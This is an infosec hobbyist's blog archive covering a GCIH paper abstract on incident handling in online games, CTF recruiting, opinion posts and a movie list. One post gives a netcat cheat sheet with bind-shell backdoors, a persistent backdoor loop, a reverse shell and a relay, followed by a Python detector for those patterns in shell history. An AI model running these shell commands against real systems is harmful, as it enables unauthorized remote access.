
3.16.2008

How to rescue orcs and spaceships

Hello, my name is Scott, and I'm a gamer. Sometimes it keeps me up way too late at night, but I care about my pretend space ships and the billions of Interstellar Kredits I've earned with them, and I'd be pissed if something happened to them.

A bit nerdy I realize, even for an information security blog, but it's true. There's no way to deny it, I do enjoy my online games. The fact is though I'm far from alone. Millions of people have been getting into one of the many massive multiplayer online games, from World of Warcraft to Second Life, from Lord of the Rings to EVE Online. Millions of people have invested incredible (some would probably say insane) numbers of hours in their wizards, pod pilots, hobbits, and a variety of other characters, constituting a huge investment of both time and money ($15 a month adds up). This became my motivation when I decided to make it the focus of my practical for my GIAC Certified Incident Handler Gold certification.

I've been fascinated by the numerous security exploits in various online games. From EVE Online's database hack to Charlie Miller & Dino Dai Zovi's Second Life exploit, it's interesting to see the unique factors that go into handling attacks in multiplayer online games. On one hand it's very much like a real economy: characters have assets, experience, and money of some kind. On the other it's very much different (you can't exactly roll back a week of financial transactions in the real world).

As a result I've chosen to make my practical for getting my GCIH Gold certificate a study on Incident Handling in online games focused on case studies of actual handling by various game operations teams. Here's my abstract:


While generalized incident handling practices are essential to any system or network they do not always meet the needs of specialized systems. These systems have needs that go above and beyond the usual, and must be handled with unique attention to specific hosts, their functions, interactions, and overall system architecture. However in these specialized systems with similar functions there may be a way to generalize even the specialized requirements.

As massive multiplayer online games (MMORPGs) continue to grow, through games like World of Warcraft, Second Life, and EVE Online, the amount of money being funneled into them grows as well. Where the money goes so do the criminals, and as such online games are increasingly coming to light as targets for malicious attackers. Whether attacking for financial gain or simply to gain the upper hand in gameplay, more and more vulnerabilities are being discovered and exploited in online games.

MMORPGs are unique environments; worlds with their own economies and populations, players with their own experiences and assets, all of which are unique and important to the users who have invested hours upon hours into their virtual personas. This combination and complexity creates the vibrant and unique environments that make these games interesting to play, but it also creates nightmarish tradeoffs for an incident handler who must respond in the event of a compromise.

This leads to a need for unique handling of incidents and thus a unique set of processes to be followed. This does not supersede the generalized handling guidelines, nor could it be completely comprehensive, but there can be a set of generalized incident handling guidelines for online games, a superset of generalized incident handling guidelines such as those taught in the SANS 504 course.

To this end I would like to research and develop such a set of specialized handling guidelines, based on the proven general handling techniques from SANS, for consideration by incident handlers working on massive multiplayer online games. These will focus on the unique challenges and options available to handlers in online games, and will be based in large part on case studies of how such incidents have already been handled in current online games. Additionally it will include a survey of major online games, trying to gain as much insight as possible into how they currently structure their handling, in order to add as much real world experience into this effort as possible.

Even though it results in writing a paper and being uber-whitehat I'm kind of excited about writing this paper. Looking at attacking/defending online games is just beginning to get attention. That is somewhat surprising in itself since the online gaming industry is already doing billions of dollars yearly and continues growing. Nothing is quite as much fun as breaking new ground.

So now for you, my readers, I have a request: What are your thoughts and insights on my abstract for my paper and on the topic in general? I'm very eager to hear what you have to say. Feel free to leave comments, send email (scott.roberts[at]vulnerableminds[dot]com), or send a carrier pigeon. I'm interested to hear what you have to say.

2.17.2008

Congratulations

Shmoocon IV was a good time for all. A few good talks, lots of good times meeting up with people, and for Alice, Mike, Sean, and Tim it was good old-fashioned hacker fun as all of them played in Shmoocon's annual "Hack or Halo" competition. Now Mike was last year's champion, and tied for first, but it was Tim who came in with the fastest time and was this year's Hack or Halo winner.


Congratulations to Tim and everyone who participated.

2.07.2008

CTF is coming & VM is recruiting


It may be a couple months away but Vulnerable Minds is getting ready for one of the best parts of the year. No, not Christmas, Defcon. Say what you want about the Riviera, but Defcon is definitely one of the biggest events in the hacking community. Last year Vulnerable Minds competed for the first time in the Defcon qualifier, hoping to earn a spot to play CTF in Vegas.

Vulnerable Minds put in a good effort and did well for our first attempt. Out of 170 teams participating we ended up placing 30th, besting a number of very talented teams.

So now it's time to turn our thoughts towards this year's competition. Vulnerable Minds is looking to build off last year's strong showing and do even better this year. To that end we are looking for talented hackers interested in playing CTF, qualifying, and going to DefCon to play. Reversers, sploit coders, forensics gurus, even defensive specialists. DC area is preferred.

Not sure if this is your cup of tea? Check out information about qualification and CTF from the past two years from the L@stplace team (Winners the past two years at Defcon).

Interested? Fill out this handy contact form and we'll get in touch with you.

7.31.2007

All the networking you could need: Netcat

So my SANS course this past week culminated today with a nice game of capture the flag. While not Defcon caliber it ended up being quite a lot of fun, especially for a game that could only last six hours, and did a fantastic job of bringing the course together. We learned a lot of tools during the class and playing scenario-based CTF brought it all together as many of them were used during the game. Mostly we focused on the old favorites: NMap, Nessus, John the Ripper; the kinda tools that have been around forever, and for good reason.

We focused mainly on another tool, one I'd known but used little. Called the "network swiss-army knife", Netcat proved, as we were promised by Ed, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that. I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50 in case you were wondering) just to get any other Netcat neophytes started and possibly remind some old hands of some fun tricks:

Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]

Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]

Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe

Persistent Backdoor:
while [ 1 ]; do nc -l -p [port] -e /bin/sh; done

Reverse Shell:
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]

Backdoor Client:
nc [server ip] [port]

Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0<backpipe | nc [target ip] [port] 1>backpipe

Traffic Replay:
nc [targetip] [port] < [filename]
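
From the defender's side, the patterns in this cheat sheet are recognizable in shell history or command-line logs. The following is an added example, not part of the original post or the SANS course material: a small Python classifier for netcat command lines, where the sample lines, the label names, and the option table (based on traditional netcat 1.10) are assumptions.

```python
import re
import shlex

# Binary names treated as netcat (assumption: extend for your environment).
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "netcat", "nc.traditional"}
# Single-letter options that take a value in traditional netcat 1.10.
VALUE_FLAGS = set("egGiopsw")

def parse_nc(tokens):
    """Return (flags, values) for a netcat invocation, or None if not netcat."""
    if not tokens or tokens[0].rsplit("/", 1)[-1].lower() not in NETCAT_NAMES:
        return None
    flags, values, i = set(), {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-") and len(tok) > 1 and not tok.startswith("--"):
            for pos, ch in enumerate(tok[1:], start=1):
                flags.add(ch)
                if ch in VALUE_FLAGS:
                    rest = tok[pos + 1:]  # "-p4444" form, else the next token
                    if not rest and i + 1 < len(tokens):
                        i += 1
                        rest = tokens[i]
                    values[ch] = rest
                    break
        i += 1
    return flags, values

def classify(cmdline):
    """Label one typed command line with the cheat-sheet pattern it matches."""
    looped = re.match(r"\s*(while|until|for)\b", cmdline) is not None
    invocations = []
    for seg in re.split(r"[|;&]+", cmdline):
        seg = seg.replace("\\", "/")  # keep Windows paths intact for shlex
        try:
            tokens = shlex.split(seg)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = seg.split()
        if tokens and tokens[0] == "do":
            tokens = tokens[1:]
        parsed = parse_nc(tokens)
        if parsed:
            invocations.append(parsed)
    if not invocations:
        return None
    listening = any("l" in flags for flags, _ in invocations)
    if any("e" in flags for flags, _ in invocations):
        kind = "bind-shell" if listening else "reverse-shell"
        return "persistent-" + kind if looped else kind
    if listening and len(invocations) > 1 and "|" in cmdline:
        return "relay"
    return "listener" if listening else "client"

# Constructed sample input: shell-history style lines, documentation addresses.
SAMPLE_HISTORY = [
    "nc -l -p 4444 -e /bin/sh",
    "while [ 1 ]; do nc -l -p 4444 -e /bin/sh; done",
    "nc 192.0.2.10 4444 -e /bin/sh",
    "C:\\tools\\nc.exe -lvp 4444 -e cmd.exe",
    "mknod backpipe p",
    "nc -l -p 8080 0<backpipe | nc 192.0.2.20 80 1>backpipe",
    "nc -l -p 9000 > upload.bin",
    "tar czf - /srv | nc 192.0.2.30 9000",
]

def scan(history):
    """Return (label, line) for every line that runs netcat."""
    return [(label, line) for line in history if (label := classify(line))]
```

Process-execution logs record each program's arguments but not the shell's pipes and redirections, so the relay label needs shell history or a logged `sh -c` string; the `-e` cases show up in either source.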

A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.

6.25.2007

Bad Reputation vs Bad Assumptions

I was wandering through my blog list today and, by way of the ever enjoyable Observations of a Digitally Enlightened Mind, came across an interesting but, in my opinion, totally unfounded and flawed article related to security.

The article in question is one where PopSci published a list of the 10 Worst Jobs in Science. Many of them are truly awful and I wouldn't wish them on my worst enemy. Mind numbingly, stomach turningly bad. It was #6, nearly half way down a terrifying list, that the job in question was described.

Now I've been a Microsoft hater in my day, no question. As a security type person they've been quite the headache at various times, and as an Apple fan I don't really find it an enjoyable system to use. That being said if Microsoft were to track me down and ask if I was interested in a job working with their security teams I'd jump at it. 

Now the article is very correct about one aspect of it. Microsoft does wear a big "Hack Me" sign. It'd be nonstop pandemonium. Attacks at every angle, computer criminals gunning for you every day. If it's not the operating system it's the office suite, if it's not the office suite, it's the browser. There are few pieces of code attacked as aggressively as Microsoft's, it comes with the territory when you dominate the market place in so many genres the way they do. Microsoft should wear that "Hack Me" sign proudly, maybe with a big gold chain (that they can afford) and some bling letters.

So yes, under attack constantly. While I can't speak for anyone else that's exactly why I'd want to work for them, and I think that's perfectly natural. Surgeons may not like people being sick or hurt, but they sure enjoy cutting them open, or so I'm told (by my uncle who is one). It's the same with information security. A week (like the past couple) with few large threats gets dull quickly. Now the week when the ANI attacks came out, that was fun. Would working for Microsoft be easy? Not in the least but rarely do people learn when they're "safe". They don't grow without challenges.

If I wanted easy I'd go be a security guy for a small mom and pop somewhere, nice and safe, with a small number of supported apps, a smaller number of machines, and five users I could personally beat for being stupid. The Microsofts, Amazons, Mozillas, government groups and financials are in the thick of it, defending dozens of complex pieces of software, hundreds of thousands of machines, and billions of dollars. The Internet is a very dangerous place for groups like those and I believe that's the most attractive reason to work for them.

6.10.2007

And the answers please...

Over at Nopsr.us the Underminers (aka 1@stPlace, winners of last year's Defcon CTF) have put up a follow-up to last year's CTF quals writeup, which you can find here.

@tlas and his gang do a fantastic job walking through each of the challenges, and a lot can be learned from just taking a look. Even better, they managed to pry the challenge source code out of Kenshoto's hands (a feat they managed to pull off before I did) and have it posted, so that nearly the entire scenario can be recreated for ownage pleasure in your very own home. So go give it a look, you'll learn a bunch.

For those who are curious, Vulnerable Minds did play this year and were quite pleased with our 30 out of 160 finish. In what is the largest Defcon qualification year ever we were stoked to come in the top fifth and had an awesome time. ev3, Narc, LogicX, Bacon, Gpmidi, Bacchus, and myself spent most of the weekend at Akolyte and Saijak's apt, chugging Red Bull, watching Jurassic Park on repeat (seriously Pwnage100 was crap), and hacking to our hearts' content. It was a great weekend, the challenges were excellent, tough but enjoyable, and it was one of the most fun and interesting events I've been a part of.

So props to the Kenshoto guys for a fantastic quals round, to the NopsR.Us/Underminers/1@stplace guys for the fantastic writeups, and to the Minds who dedicated their weekend to playing a fantastic game.

And watch out next year because Vulnerable Minds is coming to break all of your plates!

5.26.2007

Love of the game.

So! The qualifying round of DefCon's infamous Capture the Flag competition is this weekend. I'm excited, and not just because this would be my first CtF experience. The synergy (more or less) of people coming together with different experiences, knowledge, and ways of looking at problems could prove to be a great way to delve deeper into the field of code and code manipulation. (Let's be honest here, when it comes down to it, this is less about offense or defense and more about mental technique.)

This weekend, a group of us will be sharing one apartment, eating each other's food, hacking to the point of exhaustion... I can't think of a better way to spend a random summer weekend, but that could just be me. ;)

In preparation, I've been looking over last year's quals, helpfully posted by last year's team 1@stPlace. I think one of the things that blew me away was the wide range of topics presented, and the variety of exploitable things. XSS? Bitstream analysis? Reverse engineering protocols? Stealing entangled qbits? OK, just kidding about that last one, but it goes to show what an awesome, diverse field infosec can be. And as much as this is about hacking and having fun, I can only wonder what future DefCon CTFs may hold, especially with the dominance of mobile computing...

But the future can wait. This weekend, let teh funz beg!n.

2.10.2007

Quick Note

Ivan Krstic is scary smart. That is all.

12.03.2006

Before you mention it...

One of my least favorite things is when something from the infosec world makes the "real" news. There's stuff going on all the time that could drastically affect everyone who's ever even thought of being near a computer, but they're often ignored, and it's a mystery to see what becomes big news, and what's ignored.

Example:

Big issue That Was Largely Ignored: Net Neutrality

The Internet being segmented based solely on how much money you spend to be on the Internet. Spent millions per year to have multiple OC-3 connections directly to a backbone? You get priority. Spent $40 per month (which is still way too expensive, Comcast) to get a mid range home cable connection? You're a second tier citizen whose needs and wants come second.
Results: Companies like Microsoft, Comcast, Verizon, and others paying to control the Internet to make even more money than they do now. For people like you and me YouTube becomes impossible to use, those with the desire to can run even fewer home servers than now, and the general expectations you have of how the Internet should act go out the window.

Minor Issue That Is Getting Huge Attention: The "Cyber Jihad" Against the United States Banking System
One small extremist website has announced they're going to attack the US financial infrastructure during the month of December. Hmmm, terrifying. Guess what, attacks happen all the time. There are already attacks coming from every edge of the globe all the time. Crime goes where the money goes. Banks have money. Put two and two together. Figured it out?
Guess what, the banks have too, most of them back in the 1990's, and the vast majority of them are well prepared. While I have no evidence to support this I feel pretty safe saying that the financial world is second only to the military in being ready to deal with cyber threats. In some cases the military could probably even learn a thing or two. I'm not really concerned that I'm going to wake up in the morning and find my bank compromised by Muslim extremists any more than I'm worried about the Falun Gong, the Tamil Tigers, or some random kid in a basement in Idaho.

Now I don't blame the people around me who get worked up about this sort of thing. I blame the media, their biases and their ignorance, for which stories get big play and make the 6 o'clock news, and which ones never get mentioned off the infosec specific news sites. That's not my friends' and family's fault. What I am tired of is when everyone from my friends and family to random people I meet on the street want to tell me about whatever issue makes it into the media as though I've never heard of it before, insinuating that I personally, and the security industry in general, aren't prepared for it, and in such a way that they've done me a favor by informing me of it.

Now asking me about something like the Cyber Jihad, knowing the field I'm in, is fine and I'd be happy to give my opinion if asked for it (I'm sure you're muttering something about my willingness to provide opinions right now). I actually enjoy that. That being said, don't insult me by expecting I have no idea about something that you caught on CNN and acting like you're helping me out. Security people, be it information security, physical security, homeland security, or any other security, are news junkies of the highest caliber. Security thrives on being aware of the changing threat landscape, so it's safe to assume that not only is any security person you know very in tune with mainstream media, but is also tapped into many industry specific news sources, and was probably intimately aware of and already moved on past any event before it even makes it to some mainstream media editor's desk.

So thanks for the tip, whatever it was, but I was already aware. Save the energy and give Security Focus or the Internet Storm Center a look. You might learn something.

Out of curiosity: Am I the only one who deals with this and feels this way?

11.16.2006

Gauntlet Thrown...

So driving home from a meeting of the DC Linux Users Group to hear a gentleman from Amazon discuss their many Amazon Web Services offerings, of which I'm already using S3 and curious about some of the others, my friends and I began discussing movies. Like much of the nation I went and saw Borat: LoAftmbtGnoK (yeah, LotR seems much easier to say huh?), found it humorous, and recommended it to my friend al3x.

Let's clear one thing up: Borat was a movie that was great because it was so bad. Sasha Cohen is brilliant in knowing how inane, how crude, how sarcastic he can be, pushing the envelope of funny, bordering on obnoxious the whole time, and at least to most, not crossing over. It's a fine line, and I can understand why some would find it less than enjoyable, but to most I think it was amusing.

al3x was not so amused, which shouldn't have surprised me much, but I was surprised when this led to a general questioning of my taste in movies in general. The group then proceeded to debate the merits of the.... "classic"(?!?) Debbie Does Dallas, while continuing to question my taste. Obviously an ironic situation. Brittany, still questioning my taste (while debating whether Debbie did all of Dallas or simply its most questionable areas) suggested I attempt to justify my taste by detailing my Top 5 favorite movies from the past few years. As I said in my title, a gauntlet thrown down, and now a gauntlet picked up. Prepare to duel:

  • V for Vendetta: What's not to love? A sort of twisted, retro futuristic 1984 style government commentary with much of the fun of the Matrix but with decent acting, a well thought out even if kind of hit over the head plot, and something to be taken away from it. My goodness, it's like cinema is attempting to challenge its audience a bit. The greatest bit of cinematography ever? No. Engaging, topical, and enjoyable? Indeed.
  • The Road to Perdition: Perhaps the best piece of pure cinema to go mainstream in the past 5 years, this movie had a combination of story, dialogue, cast, soundtrack, and cinematography that I can scarcely think of an equal to. The story was incredibly compelling in the twisted "wanting the bad guy to win" sort of way that Hollywood often tries, but usually fails to do successfully. Not to mention it's been one of the few movies to realize that sometimes it's more powerful when there's less dialogue than more. The camera work was also out of this world.
  • The Boondock Saints: I'm gonna get ripped up on this one but I can't say I care for a second. Say what you want. I don't know of a small release movie that a wider range of people have enjoyed as much and as often as Boondock Saints. It can't even be called a cult following, there's way too wide a range of people. It's witty, it's silly, it's serious, great sound track, better acting than the film deserved, and it asks a moral question that's easy to overlook considering fun movies like that rarely ask tough questions. Not to mention it contains easily the most hardcore prayer in history.
  • Inside Man: Every guy loves a good heist movie. All of them. There isn't a guy on earth who doesn't love the righteous (or at least semi righteous) band of thieves who steals an incredible amount of jewels, money, paintings, or cars through an elaborate scheme that makes you question whether the writers are really on the up and up. There aren't too many girls who don't enjoy them also. Gone in 60 Seconds was good, Oceans 11 was better (but 12 was a joke), and I've heard great things about Heat, but Inside Man tops the genre. Again, superb acting, the most brilliant setup that was both elaborate but plausible, and a bad guy you're not only glad gets robbed, but deserves it. Clive Owen is also the man, good guy, bad guy, can't beat him.
  • Garden State: Before you thought it'd be nothing but action movies here ya go. Kudos to Zach Braff who wrote, directed, and starred (all at 29 years of age) in this, well, not quite coming of age but something like it tale. Anyone who's ever been away from their hometown, only to come home and find it startlingly different and yet frighteningly the same can relate and enjoy this movie. Not only an outlet for Braff's talent, it also let Natalie Portman use up all that acting ability she apparently didn't want to waste on StarWars I, II, and III.
There you go. Challenge answered. I submit these movies as some of the best of the past few years. Movies nearly everyone can enjoy, that offer more than a thin veneer of enjoyment, but really provide something long lasting. Any one of these movies you could watch once every six months and never get tired of. Give them a look if you haven't already and enjoy.

And while I don't want to jump to conclusions, or jinx it in any way, I expect I'll have a new movie that I'd add to that list by the end of the day.